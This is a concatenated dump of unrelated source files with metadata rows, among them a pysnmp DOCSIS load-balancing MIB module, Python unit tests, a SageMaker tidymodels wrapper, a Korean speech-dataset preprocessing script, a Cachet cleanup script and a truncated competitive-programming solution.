docsLoadBalCmtsCmStatusGroup = ObjectGroup((1, 3, 6, 1, 4, 1, 4491, 2, 1, 2, 2, 2, 5)).setObjects(("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusGroupId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusPolicyId"), ("DOCS-LOADBALANCING-MIB", "docsLoadBalCmtsCmStatusPriority"))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
docsLoadBalCmtsCmStatusGroup = docsLoadBalCmtsCmStatusGroup.setStatus('current')
if mibBuilder.loadTexts: docsLoadBalCmtsCmStatusGroup.setDescription('Cable mode status extension objects.')
mibBuilder.exportSymbols("DOCS-LOADBALANCING-MIB", docsLoadBalChgOverStatusEntry=docsLoadBalChgOverStatusEntry, docsLoadBalCmtsCmStatusTable=docsLoadBalCmtsCmStatusTable, docsLoadBalCmtsCmStatusEntry=docsLoadBalCmtsCmStatusEntry, docsLoadBalBasicRuleDisStart=docsLoadBalBasicRuleDisStart, docsLoadBalBasicCompliance=docsLoadBalBasicCompliance, docsLoadBalChnPairsIfIndexDepart=docsLoadBalChnPairsIfIndexDepart, docsLoadBalChgOverStatusValue=docsLoadBalChgOverStatusValue, docsLoadBalMibObjects=docsLoadBalMibObjects, docsLoadBalEnable=docsLoadBalEnable, docsLoadBalGrpChgOverFails=docsLoadBalGrpChgOverFails, docsLoadBalCmtsCmStatusPriority=docsLoadBalCmtsCmStatusPriority, docsLoadBalBasicRuleDisPeriod=docsLoadBalBasicRuleDisPeriod, docsLoadBalChgOverStatusMacAddr=docsLoadBalChgOverStatusMacAddr, docsLoadBalGrpDefaultPolicy=docsLoadBalGrpDefaultPolicy, docsLoadBalGrpInitTech=docsLoadBalGrpInitTech, docsLoadBalRestrictCmStatus=docsLoadBalRestrictCmStatus, docsLoadBalChgOverGroup=docsLoadBalChgOverGroup, docsLoadBalChnPairsIfIndexArrive=docsLoadBalChnPairsIfIndexArrive, docsLoadBalChgOverLastCommit=docsLoadBalChgOverLastCommit, docsLoadBalPolicyEntry=docsLoadBalPolicyEntry, docsLoadBalChgOverStatusUpdate=docsLoadBalChgOverStatusUpdate, docsLoadBalChannelEntry=docsLoadBalChannelEntry, docsLoadBalChnPairsEntry=docsLoadBalChnPairsEntry, docsLoadBalGrpIsRestricted=docsLoadBalGrpIsRestricted, docsLoadBalSystem=docsLoadBalSystem, docsLoadBalChnPairsInitTech=docsLoadBalChnPairsInitTech, docsLoadBalBasicRuleGroup=docsLoadBalBasicRuleGroup, docsLoadBalChgOverStatusUpChnId=docsLoadBalChgOverStatusUpChnId, docsLoadBalParametersGroup=docsLoadBalParametersGroup, docsLoadBalBasicRuleEntry=docsLoadBalBasicRuleEntry, docsLoadBalRestrictCmMacAddrMask=docsLoadBalRestrictCmMacAddrMask, docsLoadBalPolicyRulePtr=docsLoadBalPolicyRulePtr, docsLoadBalGrpStatus=docsLoadBalGrpStatus, docsLoadBalSystemGroup=docsLoadBalSystemGroup, docsLoadBalGrpChgOverSuccess=docsLoadBalGrpChgOverSuccess, docsLoadBalPolicyObjects=docsLoadBalPolicyObjects, docsLoadBalGroups=docsLoadBalGroups, docsLoadBalanceMib=docsLoadBalanceMib, docsLoadBalChgOverInitTech=docsLoadBalChgOverInitTech, docsLoadBalChgOverStatusDownFreq=docsLoadBalChgOverStatusDownFreq, docsLoadBalGrpObjects=docsLoadBalGrpObjects, docsLoadBalChnPairsTable=docsLoadBalChnPairsTable, docsLoadBalCompliances=docsLoadBalCompliances, docsLoadBalCmtsCmStatusPolicyId=docsLoadBalCmtsCmStatusPolicyId, docsLoadBalGrpEnable=docsLoadBalGrpEnable, docsLoadBalBasicRuleRowStatus=docsLoadBalBasicRuleRowStatus, docsLoadBalChgOverStatusInitTech=docsLoadBalChgOverStatusInitTech, docsLoadBalGrpTable=docsLoadBalGrpTable, docsLoadBalChgOverCmd=docsLoadBalChgOverCmd, docsLoadBalGrpEntry=docsLoadBalGrpEntry, docsLoadBalRestrictCmIndex=docsLoadBalRestrictCmIndex, docsLoadBalChannelTable=docsLoadBalChannelTable, docsLoadBalChgOverObjects=docsLoadBalChgOverObjects, docsLoadBalPolicyTable=docsLoadBalPolicyTable, docsLoadBalBasicRuleTable=docsLoadBalBasicRuleTable, docsLoadBalGrpId=docsLoadBalGrpId, docsLoadBalChgOverDownFrequency=docsLoadBalChgOverDownFrequency, docsLoadBalChgOverUpChannelId=docsLoadBalChgOverUpChannelId, docsLoadBalChgOverCommit=docsLoadBalChgOverCommit, docsLoadBalPolicyRowStatus=docsLoadBalPolicyRowStatus, docsLoadBalRestrictCmMACAddr=docsLoadBalRestrictCmMACAddr, docsLoadBalPolicyId=docsLoadBalPolicyId, docsLoadBalRestrictCmTable=docsLoadBalRestrictCmTable, PYSNMP_MODULE_ID=docsLoadBalanceMib, docsLoadBalNotifications=docsLoadBalNotifications, docsLoadBalBasicRuleEnable=docsLoadBalBasicRuleEnable, docsLoadBalPolicyRuleId=docsLoadBalPolicyRuleId, docsLoadBalChnPairsOperStatus=docsLoadBalChnPairsOperStatus, docsLoadBalChgOverMacAddress=docsLoadBalChgOverMacAddress, docsLoadBalRestrictCmEntry=docsLoadBalRestrictCmEntry, docsLoadBalBasicRuleId=docsLoadBalBasicRuleId, docsLoadBalChannelIfIndex=docsLoadBalChannelIfIndex, docsLoadBalCmtsCmStatusGroup=docsLoadBalCmtsCmStatusGroup, docsLoadBalConformance=docsLoadBalConformance, docsLoadBalCmtsCmStatusGroupId=docsLoadBalCmtsCmStatusGroupId, docsLoadBalChannelStatus=docsLoadBalChannelStatus, docsLoadBalChnPairsRowStatus=docsLoadBalChnPairsRowStatus, docsLoadBalChgOverStatusTable=docsLoadBalChgOverStatusTable, ChannelChgInitTechMap=ChannelChgInitTechMap, docsLoadBalChgOverStatusCmd=docsLoadBalChgOverStatusCmd, docsLoadBalPoliciesGroup=docsLoadBalPoliciesGroup)
| 187.552529
| 4,381
| 0.801954
| 1,167
| 0.024211
| 0
| 0
| 0
| 0
| 0
| 0
| 22,276
| 0.462148
|
65c5048befc6241d54580f74f3551d1f18adabab
| 671
|
py
|
Python
|
src/interview-cake/permutation-palindrome/test_permutation_palindrome.py
|
nwthomas/code-challenges
|
49c2532ff597495474e67b13f2ed9b9ad93d40b5
|
[
"MIT"
] | 1
|
2020-12-11T05:54:59.000Z
|
2020-12-11T05:54:59.000Z
|
src/interview-cake/permutation-palindrome/test_permutation_palindrome.py
|
nwthomas/code-challenges
|
49c2532ff597495474e67b13f2ed9b9ad93d40b5
|
[
"MIT"
] | 1
|
2021-04-10T06:53:30.000Z
|
2021-04-10T06:53:30.000Z
|
src/interview-cake/permutation-palindrome/test_permutation_palindrome.py
|
nwthomas/code-challenges
|
49c2532ff597495474e67b13f2ed9b9ad93d40b5
|
[
"MIT"
] | 7
|
2019-11-24T12:10:35.000Z
|
2020-12-14T22:36:31.000Z
|
from permutation_palindrome import is_permutation_palindrome
import unittest
class TestIsPermutationPalindrome(unittest.TestCase):
def test_returns_true_if_possible_palindrome(self):
"""Returns true if a palindrome is possible with a given permutation of a string"""
result = is_permutation_palindrome("hdhdiuigygyoioi")
self.assertTrue(result)
def test_returns_false_if_not_possible_palindrome(self):
"""Returns false if a palindrome is not possible with a given permutation of a string"""
result = is_permutation_palindrome("ahsidfha")
self.assertFalse(result)
if __name__ == "__main__":
unittest.main()
| 35.315789
| 96
| 0.754098
| 542
| 0.80775
| 0
| 0
| 0
| 0
| 0
| 0
| 208
| 0.309985
|
65c5b96f2aa86a20d59448029f070a81f3667eea
| 3,199
|
py
|
Python
|
sagemaker_tidymodels/tidymodels.py
|
tmastny/sagemaker-tidymodels
|
fdb6a71d2ca54b7ffce7c5bab12067413ebb4026
|
[
"MIT"
] | 3
|
2020-11-23T18:16:05.000Z
|
2021-03-23T16:48:24.000Z
|
sagemaker_tidymodels/tidymodels.py
|
tmastny/sagemaker-tidymodels
|
fdb6a71d2ca54b7ffce7c5bab12067413ebb4026
|
[
"MIT"
] | 4
|
2020-07-25T21:49:55.000Z
|
2020-08-03T15:37:49.000Z
|
sagemaker_tidymodels/tidymodels.py
|
tmastny/sagemaker-tidymodels
|
fdb6a71d2ca54b7ffce7c5bab12067413ebb4026
|
[
"MIT"
] | null | null | null |
from sagemaker.estimator import Framework
from sagemaker.model import FrameworkModel
from sagemaker.predictor import RealTimePredictor
import subprocess
def _run_command(command):
return (
subprocess.run(command.split(" "), stdout=subprocess.PIPE,)
.stdout.decode("utf-8")
.strip()
)
def get_account():
command = "aws sts get-caller-identity --query Account --output text"
return _run_command(command)
def get_region():
command = "aws configure get region"
return _run_command(command)
def get_role(profile="sagemaker"):
command = "aws configure get role_arn --profile {}".format(profile)
return _run_command(command)
class TidymodelsPredictor(RealTimePredictor):
def __init__(self, endpoint_name, sagemaker_session=None, **kwargs):
super(TidymodelsPredictor, self).__init__(
endpoint_name, sagemaker_session=sagemaker_session, **kwargs
)
class TidymodelsModel(FrameworkModel):
# `FrameworkModel` accepts a `dependencies` argument to make more code availabe
# in `/opt/ml/code`: https://github.com/aws/sagemaker-python-sdk/blob/8b2d5c8d73236b59bca6fdcaf96f227a01488288/src/sagemaker/model.py#L704-L712
__framework_name__ = "tidymodels"
def __init__(
self,
model_data,
image,
role,
entry_point,
predictor_cls=TidymodelsPredictor,
**kwargs
):
super(TidymodelsModel, self).__init__(
model_data, image, role, entry_point, predictor_cls=predictor_cls, **kwargs
)
class Tidymodels(Framework):
def __init__(self, entry_point, image_name, role, train_instance_type, **kwargs):
train_instance_count = kwargs.get("train_instance_count")
if train_instance_count:
if train_instance_count != 1:
raise AttributeError(
"Tidymodels does not support distributed training. "
"Please remove the 'train_instance_count' argument or set "
"'train_instance_count=1' when initializing SKLearn."
)
super(Tidymodels, self).__init__(
entry_point=entry_point,
image_name=image_name,
role=role,
train_instance_type=train_instance_type,
**dict(kwargs, train_instance_count=1)
)
def create_model(
self, entry_point=None, source_dir=None, dependencies=None, role=None, **kwargs
):
return TidymodelsModel(
model_data=self.model_data,
image=self.image_name,
role=(role or self.role),
entry_point=(entry_point or self.entry_point),
source_dir=(source_dir or self._model_source_dir()),
dependencies=(dependencies or self.dependencies),
**kwargs
)
@classmethod
def _prepare_init_params_from_job_description(
cls, job_details, model_channel_name=None
):
init_params = super(Tidymodels, cls)._prepare_init_params_from_job_description(
job_details, model_channel_name
)
init_params["image_name"] = init_params.pop("image")
return init_params
| 30.759615
| 147
| 0.660832
| 2,506
| 0.78337
| 0
| 0
| 353
| 0.110347
| 0
| 0
| 586
| 0.183182
|
65c60fb41ff8d93478e349410ca2f8f7c41a7cea
| 835
|
py
|
Python
|
articles/pdf2bib.py
|
kenbeese/articles
|
389ed551fb5ed0c6a5c64726e527acd6154e83f5
|
[
"BSD-3-Clause"
] | 4
|
2015-02-07T10:04:50.000Z
|
2022-01-17T18:33:26.000Z
|
articles/pdf2bib.py
|
termoshtt/articles
|
389ed551fb5ed0c6a5c64726e527acd6154e83f5
|
[
"BSD-3-Clause"
] | null | null | null |
articles/pdf2bib.py
|
termoshtt/articles
|
389ed551fb5ed0c6a5c64726e527acd6154e83f5
|
[
"BSD-3-Clause"
] | null | null | null |
# coding=utf-8
def pdf2text(pdf_path,encoding="ASCII7"):
import subprocess
import os.path
pdf_path = os.path.abspath(pdf_path)
subprocess.call(["pdftotext","-l","1","-enc",encoding,"-q",pdf_path])
text = os.path.splitext(pdf_path)[0] + ".txt"
return text
def pick_out_doi(txt):
import re
body = open(txt)
reg = re.compile(r'\b(10[.][0-9]{4,}(?:[.][0-9]+)*/(?:(?!["&\'<>,])\S)+)\b')
m = reg.search(body.read())
if m == None:
raise Warning("DOI is not found.")
else:
return m.group(0)
def doi2bib(doi):
import urllib2
uri = "http://dx.doi.org/"
edoi = urllib2.quote(doi)
url = uri + edoi
req = urllib2.Request(url, headers = {"Accept":"text/bibliography; style=bibtex"})
bibstr = urllib2.urlopen(req).read()
return unicode(bibstr, "utf-8")
| 27.833333
| 86
| 0.589222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 201
| 0.240719
|
65c64d0d6e346b2c86db0238e477f1aee46d6160
| 2,313
|
py
|
Python
|
tensorflow/python/data/experimental/kernel_tests/serialization/textline_dataset_serialization_test.py
|
DanMitroshin/tensorflow
|
74aa353842f1788bdb7506ecceaf6ba99140e165
|
[
"Apache-2.0"
] | 4
|
2021-06-02T03:21:44.000Z
|
2021-11-08T09:47:24.000Z
|
tensorflow/python/data/experimental/kernel_tests/serialization/textline_dataset_serialization_test.py
|
DanMitroshin/tensorflow
|
74aa353842f1788bdb7506ecceaf6ba99140e165
|
[
"Apache-2.0"
] | 7
|
2021-11-10T20:21:23.000Z
|
2022-03-22T19:18:39.000Z
|
tensorflow/python/data/experimental/kernel_tests/serialization/textline_dataset_serialization_test.py
|
DanMitroshin/tensorflow
|
74aa353842f1788bdb7506ecceaf6ba99140e165
|
[
"Apache-2.0"
] | 3
|
2021-05-09T13:41:29.000Z
|
2021-06-24T06:12:05.000Z
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for checkpointing the TextLineDataset."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests import reader_dataset_ops_test_base
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.framework import combinations
from tensorflow.python.platform import test
class TextLineDatasetCheckpointTest(
reader_dataset_ops_test_base.TextLineDatasetTestBase,
checkpoint_test_base.CheckpointTestBase, parameterized.TestCase):
def _build_iterator_graph(self, test_filenames, compression_type=None):
return core_readers.TextLineDataset(
test_filenames, compression_type=compression_type, buffer_size=10)
@combinations.generate(test_base.default_test_combinations())
def testTextLineCore(self):
compression_types = [None, "GZIP", "ZLIB"]
num_files = 5
lines_per_file = 5
num_outputs = num_files * lines_per_file
for compression_type in compression_types:
test_filenames = self._createFiles(
num_files,
lines_per_file,
crlf=True,
compression_type=compression_type)
# pylint: disable=cell-var-from-loop
self.run_core_tests(
lambda: self._build_iterator_graph(test_filenames, compression_type),
num_outputs)
# pylint: enable=cell-var-from-loop
if __name__ == "__main__":
test.main()
| 39.20339
| 89
| 0.750108
| 1,000
| 0.432339
| 0
| 0
| 641
| 0.277129
| 0
| 0
| 818
| 0.353653
|
65c8b9280ebaf25f0fb4b1658671be5a8f2ed641
| 228
|
py
|
Python
|
apps/news/forms.py
|
LishenZz/my_project
|
c2ac8199efb467e303d343ea34ed1969b64280d7
|
[
"Apache-2.0"
] | null | null | null |
apps/news/forms.py
|
LishenZz/my_project
|
c2ac8199efb467e303d343ea34ed1969b64280d7
|
[
"Apache-2.0"
] | null | null | null |
apps/news/forms.py
|
LishenZz/my_project
|
c2ac8199efb467e303d343ea34ed1969b64280d7
|
[
"Apache-2.0"
] | null | null | null |
#Author:Li Shen
from django import forms
from apps.forms import FormMixin
class PublicCommentForm(forms.Form,FormMixin):
#CharField字长在form可不定义,但是在model模型中必须定义
content=forms.CharField()
news_id=forms.IntegerField()
| 22.8
| 46
| 0.79386
| 187
| 0.708333
| 0
| 0
| 0
| 0
| 0
| 0
| 88
| 0.333333
|
65c9968621cc82c96799c6059ed2551c70dfc1c5
| 6,446
|
py
|
Python
|
data_preprocessing.py
|
hwRG/FastSpeech2-Pytorch-old-man_city
|
c32ee3a09bf2a53fcd17a2d0b74e8d1c93586573
|
[
"MIT"
] | null | null | null |
data_preprocessing.py
|
hwRG/FastSpeech2-Pytorch-old-man_city
|
c32ee3a09bf2a53fcd17a2d0b74e8d1c93586573
|
[
"MIT"
] | null | null | null |
data_preprocessing.py
|
hwRG/FastSpeech2-Pytorch-old-man_city
|
c32ee3a09bf2a53fcd17a2d0b74e8d1c93586573
|
[
"MIT"
] | null | null | null |
### Data Preprocessing
## 1. Json to Transcript
## 2. Aligner
## 3. Text Replace
from jamo import h2j
import json
import os, re, tqdm
import unicodedata
from tqdm import tqdm
import hparams as hp
name = hp.dataset
first_dir = os.getcwd()
transcript = name + '_transcript.txt'
dict_name = name + '_korean_dict.txt'
data_dir = 'wavs'
json_label_dir = 'label'
def change_name(base_dir, format):
print('Change', format, 'name')
cnt = 0
speaker_table = os.listdir(base_dir)
new_speaker_table = []
for speaker in speaker_table:
if cnt == 0:
os.chdir(base_dir)
new_speaker_name = re.sub(r'[^0-9]', '', speaker)
overlap = 1
while new_speaker_name in new_speaker_table:
print(new_speaker_name, 'is dangerous')
new_speaker_name = str(overlap) + new_speaker_name[1:]
overlap += 1
new_speaker_table.append(re.sub(r'[^0-9]', '', new_speaker_name))
print(new_speaker_name, 'ok')
temp = 0
for wav in os.listdir(speaker):
if temp == 0:
os.chdir(speaker)
new_wav_name = re.sub(r'[^0-9]', '', wav)
# new wav_name을 그대로 사용해야 함
if new_wav_name[:len(new_speaker_name)] != wav:
if new_wav_name[:len(new_speaker_name)] == new_speaker_name:
new_wav_name = new_wav_name + wav[-(len(format)+1):]
else:
new_wav_name = new_speaker_name + new_wav_name + wav[-(len(format)+1):]
os.rename(wav, new_wav_name)
temp+=1; cnt +=1
os.chdir('../')
os.rename(speaker, new_speaker_name)
print(cnt,'All Done', end='\n\n')
os.chdir('../')
def json_to_transcripts():
speakers = os.listdir(json_label_dir)
speakers.sort()
print(len(speakers), "speaker's are Sorted.")
os.chdir(json_label_dir)
utterance_text = []
cnt = 1
for speaker in speakers:
for file in os.listdir(speaker):
if cnt % 1000 == 0:
print(cnt, 'Done')
utterance_set = []
with open(os.path.join(speaker, file)) as f:
json_data = json.load(f)
utterance_set.append(file[:-4] + 'wav')
utterance_set.append(line_replace(json_data['발화정보']['stt']))
sep_text = unicodedata.normalize('NFD',line_replace(json_data['발화정보']['stt']))
utterance_set.append(sep_text)
utterance_set.append(round(float(json_data['발화정보']['recrdTime']),1))
utterance_text.append(utterance_set)
cnt+=1
print(cnt-1, 'All Done')
os.chdir('../')
with open(transcript, "w") as file:
for utt in utterance_text:
file.write(utt[0][:6] + '/' + utt[0] + '|' + utt[1] + '|' + utt[1] + '|' + utt[2] + '|' + str(utt[3]) + '|' + 'None\n')
def line_replace(line):
line = line.replace('(SP:)', '')
line = line.replace('(SP:', '')
line = line.replace('(SN:)', '')
line = line.replace('(SN:', '')
line = line.replace('(NO:)', '')
line = line.replace('(NO:', '')
line = line.replace('spn', '')
line = line.replace('', '')
line = line.replace('', '')
line = line.replace('', '')
line = line.replace('', '')
line = line.replace('毛', '')
line = line.replace(')', '')
line = line.replace('(', '')
line = line.replace('"', '')
line = line.replace('.', '')
line = line.replace('[', '')
line = line.replace(',', '')
line = line.replace('!', '')
line = line.replace('?', '')
line = line.replace(']', '')
line = line.replace('.', '')
line = line.replace(' ', ' ')
return line
def aligner():
filters = '([.,!?])"'
file_list = []
with open(transcript, 'r', encoding='utf-8') as f:
for line in f.readlines():
temp = line.split('|')
file_dir, script = temp[0], temp[3]
script = re.sub(re.compile(filters), '', script)
script = line_replace(script) # !!! 여기서 핵심 삭제
#file_dir = file_dir.split('/') 폴더 별로 나눌 경우
fn = file_dir[:-3] + 'lab'
file_dir = os.path.join(data_dir, fn)
#print(file_dir)
with open(file_dir, 'w', encoding='utf-8') as f:
f.write(script)
file_list.append(os.path.join(file_dir))
jamo_dict = {}
for file_name in tqdm(file_list):
sentence = open(file_name, 'r', encoding='utf-8').readline()
jamo = h2j(sentence).split(' ')
for i, s in enumerate(jamo):
if s not in jamo_dict:
jamo_dict[s] = ' '.join(jamo[i])
with open(dict_name, 'w', encoding='utf-8') as f:
for key in jamo_dict.keys():
content = '{}\t{}\n'.format(key, jamo_dict[key])
f.write(content)
print("Aligner Done\n")
def mfa_train():
print("MFA Training Start.. \n")
os.system('mfa train_g2p ' + dict_name + ' ' + name + '_korean.zip --clear')
print("MFA train_g2p Done\n")
os.system('mfa g2p ' + name + '_korean.zip ' + data_dir + ' ' + name + '_korean.txt')
print("MFA g2p Done\n")
os.system('mfa train ' + data_dir + ' ' + name + '_korean.txt ./textgrids --clean')
os.system('mv ~/Documents/MFA/wavs_train_acoustic_model/sat_2_ali/textgrids ./')
os.system('zip -r textgrids.zip textgrids')
os.system('mv textgrids.zip ' + first_dir) # 메인 dir로 옮겨
print("MFA Training Done! \n")
def lab_separate():
speaker_list = os.listdir('wavs')
os.mkdir('lab')
for speaker in speaker_list:
os.mkdir('lab/' + speaker)
lab_list = os.listdir(os.path.join('wavs', speaker))
for lab in lab_list:
if lab[-3:] == 'lab':
os.system('mv ' 'wavs/' + speaker + '/' + lab + ' lab/' + speaker)
if __name__ == '__main__':
os.chdir('dataset/' + hp.dataset)
change_name('wavs', 'wav')
#change_name('label', 'json')
#json_to_transcripts()
aligner()
mfa_train()
lab_separate()
| 31.910891
| 135
| 0.51691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,248
| 0.191001
|
65cb00b6e400d3acf13ccac0a2014cd803772f2a
| 1,435
|
py
|
Python
|
cachet-tools/purge-cachet.py
|
thearifismail/black-box-tester
|
23114fa73394a141bc091d6903e3ef4202f80bbf
|
[
"MIT"
] | null | null | null |
cachet-tools/purge-cachet.py
|
thearifismail/black-box-tester
|
23114fa73394a141bc091d6903e3ef4202f80bbf
|
[
"MIT"
] | 3
|
2020-01-02T13:04:07.000Z
|
2020-02-05T14:18:50.000Z
|
cachet-tools/purge-cachet.py
|
thearifismail/black-box-tester
|
23114fa73394a141bc091d6903e3ef4202f80bbf
|
[
"MIT"
] | 5
|
2019-11-07T20:55:05.000Z
|
2020-07-15T13:59:07.000Z
|
#!/usr/bin/env python3
import requests
import os
import json
CACHET_HOSTNAME = os.environ.get("CACHET_HOSTNAME")
URL = f"https://{CACHET_HOSTNAME}/api/v1/components"
HEADERS = {
'X-Cachet-Token': os.environ.get("CACHET_TOKEN")
}
with requests.Session() as session:
session.headers.update(HEADERS)
response = session.get(URL + "/groups", verify=False)
groups = response.json()['data']
print("Number of groups found: " + str(len(groups)))
for group in groups:
components = group['enabled_components']
print(group['name'] + " contains " + str(len(components)) + " components")
for component in components:
print("Deleting component: " + component['name'])
cdr = session.delete(URL + "/" + str(component['id']), verify=False, )
print (cdr)
# delete the group
print("Deleting group " + group['name'])
gdr = session.delete(URL + "/groups/" + str(group['id']), verify=False, )
print(gdr)
# check and delete components not in any groups
response = session.get(URL, verify=False)
components = response.json()['data']
print("Number of components not in any group: " + str(len(components)))
for component in components:
print("Deleting component: " + component['name'])
cdr = session.delete(URL + "/" + str(component['id']), verify=False, )
print (cdr)
print("Done!!!")
| 33.372093
| 82
| 0.622997
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 435
| 0.303136
|
65cb24c821d26b2c77253d1d9836328c541460bf
| 489
|
py
|
Python
|
astrophysics_toolset/utilities/tests/test_funcs.py
|
cphyc/astrophysics_toolset
|
36be3f459a1bbca73af6f39f0957bfac0cb122eb
|
[
"MIT"
] | 3
|
2020-07-19T15:46:48.000Z
|
2021-08-02T21:58:49.000Z
|
astrophysics_toolset/utilities/tests/test_funcs.py
|
cphyc/astrophysics_toolset
|
36be3f459a1bbca73af6f39f0957bfac0cb122eb
|
[
"MIT"
] | 30
|
2020-05-12T11:07:47.000Z
|
2022-02-27T12:54:08.000Z
|
astrophysics_toolset/utilities/tests/test_funcs.py
|
cphyc/astrophysics_toolset
|
36be3f459a1bbca73af6f39f0957bfac0cb122eb
|
[
"MIT"
] | null | null | null |
import numpy as np
from mpmath import besselj, mpf, pi, sqrt
from ..funcs import j1_over_x
@np.vectorize
def mpmath_jn_over_x(i, x):
xx = mpf(x)
if x == 0:
return float(1 / mpf(3))
else:
return float(sqrt(pi / mpf(2) / xx) * besselj(i + mpf("1/2"), xx) / xx)
def test_j1_over_x():
x = np.concatenate(([0], np.geomspace(1e-8, 10, 1000)))
yref = mpmath_jn_over_x(1, x)
yval = j1_over_x(x)
np.testing.assert_allclose(yref, yval, rtol=1e-14)
| 21.26087
| 79
| 0.615542
| 0
| 0
| 0
| 0
| 195
| 0.398773
| 0
| 0
| 5
| 0.010225
|
65cb50fe55b88d486a160d6a37760bb1772d7906
| 2,176
|
py
|
Python
|
tools/isolate-run.py
|
France-ioi/taskgrader
|
72b043195af752d68cfee1d28fb52ae6012bc9a2
|
[
"MIT"
] | 12
|
2015-02-19T20:09:04.000Z
|
2021-12-25T13:52:17.000Z
|
tools/isolate-run.py
|
France-ioi/taskgrader
|
72b043195af752d68cfee1d28fb52ae6012bc9a2
|
[
"MIT"
] | 102
|
2015-08-03T14:07:46.000Z
|
2022-02-18T19:56:55.000Z
|
tools/isolate-run.py
|
France-ioi/taskgrader
|
72b043195af752d68cfee1d28fb52ae6012bc9a2
|
[
"MIT"
] | 3
|
2016-05-12T15:03:16.000Z
|
2019-07-31T14:38:24.000Z
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2016 France-IOI, MIT license
#
# http://opensource.org/licenses/MIT
# This tool launches an isolated execution. It is intended as a wrapper around
# the execution of any command.
import argparse, os, sys
DEFAULT_EXECPARAMS = {
'timeLimitMs': 60000,
'memoryLimitKb': 128*1024,
'useCache': False,
'stdoutTruncateKb': -1,
'stderrTruncateKb': -1,
'getFiles': []
}
# Add taskgrader folder to PATH
SELFDIR = os.path.normpath(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.join(SELFDIR, '../'))
from taskgrader import IsolatedExecution
if __name__ == '__main__':
argParser = argparse.ArgumentParser(description="Makes a 'standalone' JSON file, bundling files referenced by path into the JSON to remove any reference to paths.")
argParser.add_argument('-i', '--stdin', help='Set file to pass on stdin.')
argParser.add_argument('-m', '--memory-limit', help='Set memory limit for execution, in kilobytes.', type=int)
argParser.add_argument('-t', '--time-limit', help='Set time limit for execution, in milliseconds.', type=int)
argParser.add_argument('-p', '--path', help='Set the working directory for the execution.', default='.')
argParser.add_argument('args', nargs=argparse.REMAINDER)
args = argParser.parse_args()
# Check cmd line
if not args.args:
argParser.error("No command specified.")
if '--' in args.args: args.args.remove('--')
# Set up execution parameters
execParams = {}
execParams.update(DEFAULT_EXECPARAMS)
if args.memory_limit: execParams['memoryLimitKb'] = args.memory_limit
if args.time_limit: execParams['timeLimitMs'] = args.time_limit
# Prepare files
cmdLine = ' '.join(args.args)
stdoutPath = os.path.join(args.path, 'isolate-run.stdout')
# Launch the isolated execution
execution = IsolatedExecution(None, execParams, cmdLine)
report = execution.execute(args.path, stdinFile=args.stdin, stdoutFile=stdoutPath)
sys.stdout.write(open(stdoutPath, 'r').read())
sys.stderr.write(report['stderr']['data'])
sys.exit(report['exitCode'])
| 35.672131
| 168
| 0.696691
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 923
| 0.424173
|
65cc242de89c19efa4090dc93f9caa33777e25e0
| 837
|
py
|
Python
|
monitor/monitorlibs/sendemail.py
|
vaedit/-
|
4e68910737ac794390df05ac34a6cf46339b0002
|
[
"Apache-2.0"
] | 1
|
2021-04-09T05:47:42.000Z
|
2021-04-09T05:47:42.000Z
|
monitor/monitorlibs/sendemail.py
|
vaedit/python-monitor-script
|
4e68910737ac794390df05ac34a6cf46339b0002
|
[
"Apache-2.0"
] | null | null | null |
monitor/monitorlibs/sendemail.py
|
vaedit/python-monitor-script
|
4e68910737ac794390df05ac34a6cf46339b0002
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import smtplib
from email.mime.text import MIMEText
from email.header import Header
#发送邮件函数
def smail(sub,body):
tolist = ["xx@qq.com", "xx@qq.com"]
cc = ["xx@qq.com", "xx@163.com"]
sender = '管理员 <worktest2020@163.com>'
subject = sub
smtpserver = 'smtp.163.com'
username = 'xx@163.com'
password = 'xxx'
messages = body
msg = MIMEText(messages, 'plain', 'utf-8')
msg['Subject'] = Header(subject, 'utf-8')
msg['From'] = sender
msg['To'] = ','.join(tolist)
msg['Cc'] = ','.join(cc)
try:
s = smtplib.SMTP()
s.connect(smtpserver, '25')
s.login(username, password)
s.sendmail(sender, tolist+cc, msg.as_string())
s.quit()
print '邮件发送成功'
except Exception as e:
print '邮件发送失败:%s' %e
| 26.15625
| 54
| 0.577061
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 271
| 0.307605
|
65ccdd74df24a36712a75efa27299093b23c6844
| 583
|
py
|
Python
|
submissions/abc146/f.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 1
|
2021-05-10T01:16:28.000Z
|
2021-05-10T01:16:28.000Z
|
submissions/abc146/f.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | 3
|
2021-05-11T06:14:15.000Z
|
2021-06-19T08:18:36.000Z
|
submissions/abc146/f.py
|
m-star18/atcoder
|
08e475810516602fa088f87daf1eba590b4e07cc
|
[
"Unlicense"
] | null | null | null |
import sys
read = sys.stdin.buffer.read
readline = sys.stdin.buffer.readline
readlines = sys.stdin.buffer.readlines
sys.setrecursionlimit(10 ** 7)
from collections import deque
n, m = map(int, readline().split())
s = readline().rstrip().decode()[::-1]
index = 0
ans = deque([])
for i in range(n):
for j in range(m, 0, -1):
if index + j >= n:
